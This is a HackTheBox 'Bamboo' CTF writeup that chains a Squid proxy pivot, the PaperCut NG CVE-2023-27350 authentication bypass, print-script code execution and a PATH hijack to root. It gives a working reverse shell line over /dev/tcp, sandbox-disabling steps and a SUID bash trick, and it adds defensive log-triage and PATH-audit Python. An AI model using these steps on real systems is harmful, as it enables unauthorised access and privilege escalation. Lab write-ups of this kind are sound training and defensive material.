Yogeshwar Peela

Posted on DEV Community, originally published at exploitnotes.hashnode.dev

HackTheBox: Bamboo Writeup

Summary

Bamboo is a HackTheBox machine that chains together a Squid proxy pivot, an authentication bypass in PaperCut NG (CVE-2023-27350), and a PATH hijack privilege escalation to reach root. The exposed Squid proxy on port 3128 acts as a gateway into internal services. Using the proxy to reach PaperCut NG on port 9191, an attacker abuses the SetupCompleted authentication bypass to gain admin access without credentials. From there, PaperCut's built-in scripting engine is weaponized to obtain a reverse shell. On the box, the PaperCut server binary directory sits in the system PATH and is writable by the papercut user. A root-owned process invokes a script from that directory; replacing that script with one that sets the SUID bit on /bin/bash hands over root.


Reconnaissance

Port Scan

nmap -sC -sV -A <MACHINE-IP> -oA nmap

Open ports:

| Port | Service    | Version                |
|------|------------|------------------------|
| 22   | SSH        | OpenSSH 8.9p1 (Ubuntu) |
| 3128 | HTTP proxy | Squid 5.9              |

No direct web application was exposed. Port 3128 is a Squid HTTP proxy — browsing to it directly returns an error. This means there are likely internal services only reachable through the proxy.


Pivoting Through the Squid Proxy

Discovering Internal Services with spose

spose is a port scanner that works through Squid proxies: it asks the proxy to connect to each port on the target, so it reveals services that are reachable only from the proxy host itself.

git clone https://github.com/aancw/spose
cd spose
python3 spose.py --proxy http://<MACHINE-IP>:3128 --target localhost --allports

Results:

localhost:22 seems OPEN
localhost:9191 seems OPEN
localhost:9192 seems OPEN
localhost:9195 seems OPEN

Port 9191 is the default PaperCut NG application port.

Configuring ProxyChains

Add the following line to /etc/proxychains4.conf:

http <MACHINE-IP> 3128

Verify the internal service is reachable:

proxychains curl http://127.0.0.1:9191 -v

Output (truncated):

[proxychains] Dynamic chain  ...  <MACHINE-IP>:3128  ...  127.0.0.1:9191  ...  OK
< HTTP/1.1 302 Found
< Location: http://127.0.0.1:9191/user

The redirect confirms a web application is running at /user.

Configuring Burp Suite as Upstream Proxy

To reach the internal services from Firefox, chain Burp Suite in front of the Squid proxy as an upstream proxy:

  1. Open Burp Suite → Settings → Network → Connections
  2. Under Upstream proxy servers, click Add
  3. Set:
    • Destination host: *
    • Proxy host: <MACHINE-IP>
    • Proxy port: 3128
  4. Configure Firefox to use Burp as proxy (127.0.0.1:8080)

Browsing to http://127.0.0.1:9191/user now loads the PaperCut NG 22.0 login page.


Initial Access

CVE-2023-27350 — PaperCut NG Authentication Bypass

PaperCut NG 22.0 is vulnerable to an authentication bypass through the SetupCompleted Java class: the setup-completion page stays reachable after installation, and its Login button submits an HTTP request that grants a valid admin session without any credential check. This is CVE-2023-27350 (CVSS 9.8).

Reference blog: https://community.hpe.com/t5/hpe-threat-labs/cve-2023-27350-papercut-ng-and-mf-remote-code-execution/ba-p/7266278

Step 1 — Access the setup completion page:

http://127.0.0.1:9191/app?service=page/SetupCompleted

Click Login. The application redirects to the admin Dashboard at:

http://127.0.0.1:9191/app?service=page/Dashboard

No credentials needed — we are now authenticated as admin.
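From the defender's side, both the proxy pivot and the SetupCompleted request above leave traces in Squid's access log. The following Python is an added example, not part of the original writeup; it triages constructed log lines in Squid's native format for three signals: proxied requests to loopback or private addresses, hits on service=page/SetupCompleted, and one client sweeping many ports on a single internal host.

```python
"""Triage Squid native access.log lines for the proxy-pivot pattern used above.
Added example, not part of the writeup; SAMPLE_LOG is constructed."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Squid native format: time elapsed client action/status bytes method url user hier/peer type
SAMPLE_LOG = """\
1718874001.101 12 10.10.14.5 TCP_MISS/302 410 GET http://127.0.0.1:9191/ - HIER_DIRECT/127.0.0.1 text/html
1718874001.205 3 10.10.14.5 TCP_MISS/503 0 CONNECT 127.0.0.1:9192 - HIER_NONE/- -
1718874001.310 2 10.10.14.5 TCP_MISS/503 0 CONNECT 127.0.0.1:9195 - HIER_NONE/- -
1718874002.004 40 10.10.14.5 TCP_MISS/200 8812 GET http://127.0.0.1:9191/app?service=page/SetupCompleted - HIER_DIRECT/127.0.0.1 text/html
1718874003.500 88 10.0.0.7 TCP_MISS/200 5120 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
"""

def destination(method: str, url: str) -> tuple:
    """(host, port) the proxy was asked to reach; CONNECT lines carry a bare host:port."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")
        return host, int(port)
    parts = urlsplit(url)
    return parts.hostname or "", parts.port or (443 if parts.scheme == "https" else 80)

def is_internal(host: str) -> bool:
    """True for loopback/private targets, i.e. the proxy being used as a pivot."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_loopback or ip.is_private

def triage(log_text: str, sweep_threshold: int = 3) -> dict:
    """Collect pivots to internal hosts, SetupCompleted hits and per-client port sweeps."""
    findings = {"internal_pivot": [], "setup_completed": [], "port_sweep": []}
    ports_seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, method, url = fields[2], fields[5], fields[6]
        host, port = destination(method, url)
        if is_internal(host):
            findings["internal_pivot"].append((client, host, port))
            ports_seen[(client, host)].add(port)
        if "service=page/SetupCompleted" in url:
            findings["setup_completed"].append((client, url))
    for (client, host), ports in ports_seen.items():
        if len(ports) >= sweep_threshold:
            findings["port_sweep"].append((client, host, sorted(ports)))
    return findings

if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_LOG).items():
        print(kind, hits)
```

Any hit in internal_pivot already indicates the proxy is not restricted to its intended destinations; the usual Squid fix is an http_access deny rule for loopback and internal ranges ahead of the allow rules.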

Enabling Scripting (Pre-RCE Step)

Navigate to Options → Config Editor and search for script. Two values must be changed:

| Key                             | Old value | New value |
|---------------------------------|-----------|-----------|
| print-and-device.script.enabled | N         | Y         |
| print.script.sandboxed          | Y         | N         |

Click Update on each. The page confirms "Successfully updated key value."

Remote Code Execution via Print Scripting

Step 1 - Find the printer:

Navigate to Printers → Printer List. There is one printer: [Template printer]. Click it, then go to the Scripting tab.

Step 2 - Test RCE with a ping:

Check the Enable print script checkbox and replace the default script with:

function printJobHook(inputs, actions) {
  // your script here
}
java.lang.Runtime.getRuntime().exec('ping <YOUR-IP>');

Click Apply. On the attacker machine:

tcpdump -ni tun0 icmp

Output:

13:45:58.153109 IP <MACHINE-IP> > <YOUR-IP>: ICMP echo request, id 1, seq 1, length 64
13:45:58.153301 IP <YOUR-IP> > <MACHINE-IP>: ICMP echo reply, id 1, seq 1, length 64

Code execution confirmed.

Step 3 - Reverse shell:

Start a listener:

nc -lvnp 4444

Update the print script:

function printJobHook(inputs, actions) {
  // your script here
}
java.lang.Runtime.getRuntime().exec(['/bin/bash', '-c', 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1']);

Click Apply. Shell received:

$ whoami
papercut
papercut@bamboo:~/server$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)

User flag:

papercut@bamboo:~$ cat /home/papercut/user.txt
[REDACTED]

Post-Exploitation Enumeration

Home Directory

papercut@bamboo:~$ ls -la
drwxr-xr-x  8 papercut papercut   4096 Sep 30  2025 .
-rw-r--r--  1 papercut papercut    102 Sep 29  2022 .install-config
drwxr-xr-x  5 papercut papercut   4096 May 26  2023 client
drwxr-xr-x 13 papercut papercut   4096 May 26  2023 server
-rw-r-----  1 root     papercut     33 Jun 20 06:07 user.txt

Checking server.properties

papercut@bamboo:~/server$ cat server.properties | grep password
admin.password=HASH\:$2a$10$I9n7kuIU2a0ODXhCfc3Z4e0h4G69KaFgDdksemRoNGrQf2Hu.4Xvm
database.password=

The admin password is stored as a bcrypt hash (cost factor 10), so cracking it offline is not practical.

SUID Binaries

find / -perm -4000 2>/dev/null | grep -Ev '^/snap'

Notably:

/home/papercut/server/bin/linux-x64/authpam

file authpam
# authpam: setuid executable, regular file, no read permission

authpam itself is not directly exploitable (it cannot even be read), but the directory it lives in, /home/papercut/server/bin/linux-x64, becomes relevant below.


Privilege Escalation — PATH Hijacking

Identifying the Writable PATH Entry

Running linpeas.sh revealed:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/home/papercut/server/bin/linux-x64

The last entry, /home/papercut/server/bin/linux-x64, is in the system PATH yet is owned (and therefore writable) by papercut:

ls -ld /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4096 May 26  2023 /home/papercut/server/bin/linux-x64/

Finding the Trigger with pspy64

Upload and run pspy64 to monitor processes:

wget http://<YOUR-IP>/pspy64
chmod +x pspy64
./pspy64

In the browser, navigate to Enable Printing → Print Deploy. Click Zones → Import BYOD-friendly print queues → Next → Start importing mobility printers. Then click Refresh servers.

pspy64 captures:

CMD: UID=0  PID=119891 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
CMD: UID=0  PID=119897 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key

Root (UID=0) is executing /home/papercut/server/bin/linux-x64/server-command, a shell script in the directory that papercut owns and can write to. Clicking Refresh servers on the Print Deploy page triggers this execution on demand.
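The condition found here (a PATH entry owned by an unprivileged user, and a root process running a program out of it) can be audited for before anyone abuses it. The following Python is an added example, not from the writeup; FakeStat and FAKE_FS are constructed stand-ins for os.stat that mirror the ownership shown above, and the PATH value and pspy line are the ones on this page.

```python
"""Audit PATH entries and root-run commands for the hijack condition found above.
Added example, not from the writeup; FakeStat/FAKE_FS are constructed stand-ins for os.stat."""
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, Optional

# PATH and pspy line exactly as shown on the page.
PATH_VALUE = ("/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:"
              "/usr/games:/usr/local/games:/snap/bin:/home/papercut/server/bin/linux-x64")
PSPY_LINE = ("CMD: UID=0  PID=119891 | /bin/sh "
             "/home/papercut/server/bin/linux-x64/server-command get-config health.api.key")

@dataclass
class FakeStat:          # minimal os.stat_result stand-in (constructed)
    st_uid: int
    st_mode: int

# Constructed view of the box: every PATH dir root-owned 0755 except the PaperCut one.
FAKE_FS = {d: FakeStat(0, stat.S_IFDIR | 0o755) for d in PATH_VALUE.split(":")}
FAKE_FS["/home/papercut/server/bin/linux-x64"] = FakeStat(1001, stat.S_IFDIR | 0o755)

def fake_stat(path: str) -> FakeStat:
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]

def untrusted_reason(path: str, stat_fn: Callable = os.stat) -> Optional[str]:
    """Why a directory lets a non-root user plant a file there, or None if it is fine."""
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return "missing (whoever can create it controls its contents)"
    if st.st_uid != 0:
        return f"owned by uid {st.st_uid}, not root"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not st.st_mode & stat.S_ISVTX:
        return "group/world-writable without sticky bit"
    return None

def audit_path(path_value: str, stat_fn: Callable = os.stat) -> dict:
    """Map each risky PATH entry to the reason it is risky."""
    return {d: r for d in path_value.split(":") if (r := untrusted_reason(d, stat_fn))}

def root_exec_from_untrusted(pspy_line: str, stat_fn: Callable = os.stat) -> list:
    """Absolute program paths that a UID=0 process ran out of an untrusted directory."""
    uid = re.search(r"UID=(\d+)", pspy_line.partition("|")[0])
    if not uid or int(uid.group(1)) != 0:
        return []
    return [tok for tok in pspy_line.partition("|")[2].split()
            if tok.startswith("/") and untrusted_reason(os.path.dirname(tok), stat_fn)]
```

Run against the real system by passing nothing for stat_fn (os.stat is the default) and feeding it the live PATH and pspy output; the fix on the box side is to keep root's PATH and anything root executes under root-owned, non-writable directories.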

Exploiting the PATH Hijack

Replace server-command with a malicious script:

cd /home/papercut/server/bin/linux-x64/
echo 'chmod u+s /bin/bash' > server-command
chmod +x server-command

Go back to the browser and click Refresh servers. pspy64 confirms execution:

CMD: UID=0  PID=121468 | chmod u+s /bin/bash

Verify:

ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash

Root Shell

papercut@bamboo:/tmp$ bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]

Attack Chain

Squid proxy on port 3128 → pivot to internal services
        │
        ▼
Port scan via spose → localhost:9191 (PaperCut NG 22.0) open
        │
        ▼
CVE-2023-27350 → /app?service=page/SetupCompleted → auth bypass → admin dashboard
        │
        ▼
Disable sandbox + enable scripting via Config Editor
        │
        ▼
Printer scripting tab → Java Runtime exec() → reverse shell as papercut
        │
        ▼
linpeas / pspy64 → writable PATH dir /home/papercut/server/bin/linux-x64/
        │
        ▼
Root process invokes server-command via PATH → replace with malicious script
        │
        ▼
Click "Refresh servers" in Print Deploy → chmod u+s /bin/bash
        │
        ▼
bash -p → root

Key Vulnerabilities

| # | Vulnerability | Impact |
|---|---------------|--------|
| 1 | Squid proxy exposing internal services: port 3128 accessible externally with no restrictions | Provides a tunnel into otherwise unreachable internal services |
| 2 | CVE-2023-27350, PaperCut NG auth bypass: SetupCompleted class allows login without credentials | Full unauthenticated admin access to PaperCut |
| 3 | PaperCut scripting with disabled sandbox: admin can enable print scripting and disable the sandbox | Direct OS command execution as the papercut service user |
| 4 | Writable directory in system PATH: /home/papercut/server/bin/linux-x64/ owned by an unprivileged user but in PATH | File placement for PATH hijacking |
| 5 | Root process executing PATH-resolved binary: server-command called by UID=0 via relative PATH | Malicious script replacement leads to SUID bash and full root access |

Machine: Bamboo | Platform: HackTheBox | Difficulty: Easy–Medium
